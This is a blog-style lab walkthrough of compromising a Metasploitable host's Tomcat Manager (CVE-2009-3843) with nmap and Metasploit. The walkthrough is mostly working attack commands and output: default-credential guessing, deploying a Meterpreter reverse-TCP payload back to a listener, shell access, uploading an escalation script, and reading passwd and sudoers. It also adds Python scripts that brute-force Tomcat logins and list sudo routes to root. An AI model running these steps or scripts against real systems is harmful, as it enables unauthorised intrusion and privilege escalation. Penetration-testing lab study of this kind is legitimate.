labunix's blog

labunix's Lab Unix

Using Meterpreter to investigate CVE-2009-3843.

■Using Meterpreter to investigate CVE-2009-3843.
 Only do this against targets you are authorized to test.

msf > search type:payload platform:linux reverse_tcp

Matching Modules
================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   payload/java/jsp_shell_reverse_tcp                                normal  Java JSP Command Shell, Reverse TCP Inline
   payload/linux/aarch64/meterpreter/reverse_tcp                     normal  Linux Meterpreter, Reverse TCP Stager
   payload/linux/aarch64/meterpreter_reverse_tcp                     normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/aarch64/shell/reverse_tcp                           normal  Linux dup2 Command Shell, Reverse TCP Stager
   payload/linux/aarch64/shell_reverse_tcp                           normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/armbe/meterpreter_reverse_tcp                       normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/armle/meterpreter/reverse_tcp                       normal  Linux Meterpreter, Reverse TCP Stager
   payload/linux/armle/meterpreter_reverse_tcp                       normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/armle/shell/reverse_tcp                             normal  Linux dup2 Command Shell, Reverse TCP Stager
   payload/linux/armle/shell_bind_tcp                                normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/armle/shell_reverse_tcp                             normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/mips64/meterpreter_reverse_tcp                      normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/mipsbe/meterpreter/reverse_tcp                      normal  Linux Meterpreter, Reverse TCP Stager
   payload/linux/mipsbe/meterpreter_reverse_tcp                      normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/mipsbe/shell/reverse_tcp                            normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/mipsbe/shell_reverse_tcp                            normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/mipsle/meterpreter/reverse_tcp                      normal  Linux Meterpreter, Reverse TCP Stager
   payload/linux/mipsle/meterpreter_reverse_tcp                      normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/mipsle/shell/reverse_tcp                            normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/mipsle/shell_reverse_tcp                            normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/ppc/meterpreter_reverse_tcp                         normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/ppc/shell_reverse_tcp                               normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/ppc64/shell_reverse_tcp                             normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/ppc64le/meterpreter_reverse_tcp                     normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/ppce500v2/meterpreter_reverse_tcp                   normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/x64/meterpreter/reverse_tcp                         normal  Linux Mettle x64, Reverse TCP Stager
   payload/linux/x64/meterpreter_reverse_tcp                         normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/x64/shell/reverse_tcp                               normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/x64/shell_reverse_tcp                               normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/x86/meterpreter/reverse_ipv6_tcp                    normal  Linux Mettle x86, Reverse TCP Stager (IPv6)
   payload/linux/x86/meterpreter/reverse_nonx_tcp                    normal  Linux Mettle x86, Reverse TCP Stager
   payload/linux/x86/meterpreter/reverse_tcp                         normal  Linux Mettle x86, Reverse TCP Stager
   payload/linux/x86/meterpreter/reverse_tcp_uuid                    normal  Linux Mettle x86, Reverse TCP Stager
   payload/linux/x86/meterpreter_reverse_tcp                         normal  Linux Meterpreter, Reverse TCP Inline
   payload/linux/x86/metsvc_reverse_tcp                              normal  Linux Meterpreter Service, Reverse TCP Inline
   payload/linux/x86/shell/reverse_ipv6_tcp                          normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   payload/linux/x86/shell/reverse_nonx_tcp                          normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/x86/shell/reverse_tcp                               normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/x86/shell/reverse_tcp_uuid                          normal  Linux Command Shell, Reverse TCP Stager
   payload/linux/x86/shell_reverse_tcp                               normal  Linux Command Shell, Reverse TCP Inline
   payload/linux/zarch/meterpreter_reverse_tcp                       normal  Linux Meterpreter, Reverse TCP Inline

msf post(linux/gather/hashdump) > search type:post platform:linux sudo

Matching Modules
================

   Name                                  Disclosure Date  Rank    Description
   ----                                  ---------------  ----    -----------
   post/linux/gather/enum_users_history                   normal  Linux Gather User History
   post/multi/manage/sudo                                 normal  Multiple Linux / Unix Post Sudo Upgrade Shell

■Searching for CVE-2009-3843 modules

msf > search CVE-2009-3843

Matching Modules
================

   Name                                     Disclosure Date  Rank       Description
   ----                                     ---------------  ----       -----------
   auxiliary/scanner/http/tomcat_mgr_login                   normal     Tomcat Application Manager Login Utility
   exploit/multi/http/tomcat_mgr_deploy     2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload     2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution

■Check the module hierarchy that msfconsole uses.

$ ls /usr/share/metasploit-framework/modules/
auxiliary  encoders  exploits  nops  payloads  post

■Check the Ruby scripts used by the Tomcat modules.

$ find /usr/share/metasploit-framework/modules/ -type f -name "tomcat*"
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/tomcat_enum.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/http/tomcat_administration.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
/usr/share/metasploit-framework/modules/post/multi/gather/tomcat_gather.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_deploy.rb

■Check the scripts used for the Linux x86 Meterpreter payloads.

$ find /usr/share/metasploit-framework/modules/ -type f -name "meterpreter*" | grep x86
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
/usr/share/metasploit-framework/modules/payloads/stages/linux/x86/meterpreter.rb

■The nmap NSE script used here against tcp/8009 (AJP13) is ajp-brute. (nmap ships other ajp-* scripts as well; ajp-methods runs as part of the -A scan below, and `ls /usr/share/nmap/scripts/ajp-*` lists the rest.)

$ dpkg -L nmap | grep ajp-brute
/usr/share/nmap/scripts/ajp-brute.nse

■nmap reconnaissance

#  nmap -sV -O -T4 -p 8009,8180 192.168.0.2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 07:34 JST
Nmap scan report for 192.168.0.2
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds

# nmap -A -p 8009,8180 192.168.0.2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 07:34 JST
Nmap scan report for 192.168.0.2
Host is up (0.00052s latency).

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.72 seconds

■TCP/8009 does not require authentication.
 (ajp-brute reports "URL does not require authentication" when the AJP connector answers its probe URL with something other than 401; this says nothing about the Manager application's own credentials, which are checked over tcp/8180 below.)

$ nmap --script ajp-brute.nse -p 8009 192.168.0.2

Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-06 07:36 JST
Nmap scan report for 192.168.0.2
Host is up (0.00042s latency).
PORT     STATE SERVICE
8009/tcp open  ajp13
| ajp-brute: 
|_  URL does not require authentication

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

■Obtaining login credentials via tcp/8180

msf > search type:auxiliary CVE-2009-3843

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   auxiliary/scanner/http/tomcat_mgr_login                   normal  Tomcat Application Manager Login Utility

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2
msf auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(scanner/http/tomcat_mgr_login) > exploit
...
[+] 192.168.0.2:8180 - Login Successful: tomcat:tomcat
...
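The tomcat_mgr_login run above tries default Manager credentials over HTTP Basic auth until one is accepted. The following Python script is an added example, not code from the original post or from Metasploit: it performs the same check by sending each user:password pair to /manager/html and keeping the ones that return 200 instead of 401. The candidate list is an assumption (the post only demonstrates tomcat:tomcat), and the in-process fake Manager is a constructed stand-in for Tomcat 5.5 so the script runs offline; replace its URL with http://192.168.0.2:8180 to run it against the lab host.

```python
"""Try default Tomcat Manager credentials over HTTP Basic auth.

Added example; not code from the original post or from Metasploit's
tomcat_mgr_login module, but it performs the same check against /manager/html.
DEFAULT_CREDS is an assumed list and the fake Manager below is a constructed
stand-in so that the script runs offline.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Assumed candidate list; the post only demonstrates tomcat:tomcat.
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("manager", "manager"),
    ("tomcat", "s3cret"),
    ("admin", ""),
]


def try_login(base_url, user, password, timeout=5):
    """Return True if the Manager accepts user:password (HTTP 200), False on 401/403."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(base_url.rstrip("/") + "/manager/html",
                  headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except HTTPError as err:
        if err.code in (401, 403):
            return False
        raise  # 404 (manager not deployed) or 5xx is a real error, not a bad password


def find_valid_creds(base_url, creds=DEFAULT_CREDS):
    """Return the (user, password) pairs the target accepts, in list order."""
    return [(u, p) for u, p in creds if try_login(base_url, u, p)]


class _FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the Tomcat Manager app: only tomcat:tomcat is valid."""
    VALID = "Basic " + base64.b64encode(b"tomcat:tomcat").decode()

    def do_GET(self):
        if self.path != "/manager/html":
            self.send_error(404)
            return
        if self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Tomcat Web Application Manager")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):  # keep the console quiet
        pass


def start_fake_manager():
    """Start the fake Manager on a random loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    srv, url = start_fake_manager()  # use "http://192.168.0.2:8180" for the lab host instead
    try:
        print(find_valid_creds(url))  # -> [('tomcat', 'tomcat')]
    finally:
        srv.shutdown()
```

Only 401/403 are treated as "wrong password"; a 404 means the Manager app is not deployed at /manager, which is worth knowing before spending time on a credential list.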

■Launch a shell with the exploit.
 If even one account has a "joe" password (password identical to the username) and that account is allowed to sudo, the result is equivalent to root.

msf > search type:exploit CVE-2009-3843

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/multi/http/tomcat_mgr_deploy  2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload  2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(multi/http/tomcat_mgr_deploy) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(multi/http/tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Java Universal
   2   Windows Universal
   3   Linux x86


msf exploit(multi/http/tomcat_mgr_deploy) > set target 3
target => 3

msf exploit(multi/http/tomcat_mgr_deploy) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(multi/http/tomcat_mgr_deploy) > set LPORT 8443
LPORT => 8443

msf exploit(multi/http/tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  tomcat           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.0.2      yes       The target address
   RPORT         8180             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.3      yes       The listen address
   LPORT  8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Linux x86

msf exploit(multi/http/tomcat_mgr_deploy) > exploit

[*] Started reverse TCP handler on 192.168.0.3:8443 
[*] Using manually select target "Linux x86"
[*] Uploading 1664 bytes as j14aC2foRdhh.war ...
[*] Executing /j14aC2foRdhh/7VzvsIkB7dE6tpNHfC4YIUXHXJ9L.jsp...
[*] Undeploying j14aC2foRdhh ...
[*] Sending stage (857352 bytes) to 192.168.0.2
[*] Meterpreter session 1 opened (192.168.0.3:8443 -> 192.168.0.2:45008) at 2018-05-06 07:56:58 +0900

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=110, gid=65534, euid=110, egid=65534
meterpreter > getpid
Current pid: 9512
meterpreter > cd /tmp
meterpreter > upload autoroot.sh
[*] uploading  : autoroot.sh -> autoroot.sh

[*] 192.168.0.2 - Meterpreter session 1 closed.  Reason: Died
[-] Error running command upload: Rex::TimeoutError Operation timed out.
msf exploit(multi/http/tomcat_mgr_deploy) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.0.3:8443 
[*] Using manually select target "Linux x86"
[*] Uploading 1628 bytes as 0MAvdam3Bdl.war ...
[*] Executing /0MAvdam3Bdl/zdOsYWiueLz243hssijBX5Zio.jsp...
[*] Undeploying 0MAvdam3Bdl ...
[*] Sending stage (857352 bytes) to 192.168.0.2
[*] Meterpreter session 2 opened (192.168.0.3:8443 -> 192.168.0.2:44078) at 2018-05-06 09:24:47 +0900

meterpreter > shell
Process 9514 created.
Channel 1 created.
whoami
tomcat55
pwd
/
grep 1000 /etc/passwd
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
telnet 127.0.0.1
metasploitable login: msfadmin
msfadmin
Password: msfadmin
$ sudo grep adm /etc/sudoers
sudo grep adm /etc/sudoers
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

exit
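Once the tomcat55 shell is obtained, the post answers by hand (log in as msfadmin, then sudo grep adm /etc/sudoers) which accounts can reach root through sudo. The following Python script is an added example, not code from the original post: it expands sudoers entries such as `%admin ALL=(ALL) ALL` through /etc/group (plus primary gids from /etc/passwd) and keeps only rules that allow every command as root, so the privilege-escalation candidates can be listed from a low-privilege shell that can read those files. The three file contents are constructed samples modelled on the Metasploitable output above; on a live host read the real files instead.

```python
"""Post-exploitation triage: which local accounts can become root via sudo?

Added example, not from the original post. Expands sudoers user specifications
(including %group entries like the page's '%admin ALL=(ALL) ALL') to accounts
and keeps rules equivalent to 'ALL=(ALL) ALL'. SUDOERS, GROUP and PASSWD are
constructed samples modelled on the Metasploitable host.
"""
import re

SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root     ALL=(ALL) ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
tomcat55 ALL=(ALL) NOPASSWD: /usr/bin/less
"""

GROUP = """\
root:x:0:
admin:x:117:msfadmin
nogroup:x:65534:
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
"""

# who host=(runas) commands, e.g. "%admin ALL=(ALL) ALL"; the runas part is optional
SPEC_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
ALIAS_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def group_members(group_text, passwd_text):
    """Map group name -> set of users, adding primary-gid membership from passwd."""
    members, gid_to_name = {}, {}
    for line in group_text.splitlines():
        if line and not line.startswith("#"):
            name, _, gid, users = line.split(":")[:4]
            gid_to_name[gid] = name
            members[name] = {u for u in users.split(",") if u}
    for line in passwd_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            gname = gid_to_name.get(fields[3])
            if gname is not None:
                members.setdefault(gname, set()).add(fields[0])
    return members


def sudo_specs(sudoers_text):
    """Yield (who, host, runas, commands) per user specification line.

    '#' comments are stripped, which also drops #include/#includedir lines:
    drop-in files under /etc/sudoers.d are NOT followed here.
    """
    for raw in sudoers_text.splitlines():
        line = " ".join(raw.split("#", 1)[0].split())
        if not line or line.startswith(ALIAS_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if m:
            yield m.groups()


def grants_full_root(host, runas, commands):
    """True for rules equivalent to 'ALL=(ALL) ALL'; tags such as NOPASSWD: are ignored."""
    runas_user = (runas or "root").split(":")[0].strip()  # "(ALL:ALL)" -> "ALL"
    cmd = commands.split(":")[-1].strip()                 # "NOPASSWD: ALL" -> "ALL"
    return host == "ALL" and runas_user in ("ALL", "root") and cmd == "ALL"


def root_capable(sudoers_text, group_text, passwd_text):
    """Return sorted (user, rule) pairs for accounts that may run any command as root."""
    members = group_members(group_text, passwd_text)
    found = {}
    for who, host, runas, commands in sudo_specs(sudoers_text):
        if not grants_full_root(host, runas, commands):
            continue
        users = members.get(who[1:], set()) if who.startswith("%") else {who}
        rule = f"{who} {host}=({runas}) {commands}" if runas is not None else f"{who} {host}={commands}"
        for user in users:
            found.setdefault(user, rule)
    return sorted(found.items())


if __name__ == "__main__":
    for user, rule in root_capable(SUDOERS, GROUP, PASSWD):
        print(f"{user:10s} <- {rule}")  # msfadmin <- %admin ALL=(ALL) ALL, root <- root ALL=(ALL) ALL
```

tomcat55 is deliberately left out of the result: its rule only allows /usr/bin/less, which is a separate escalation question (a shell escape from a pager) rather than a direct ALL grant. Cross-check the listed accounts against the "joe password" suspicion from the section heading; msfadmin:msfadmin is exactly that case on this host.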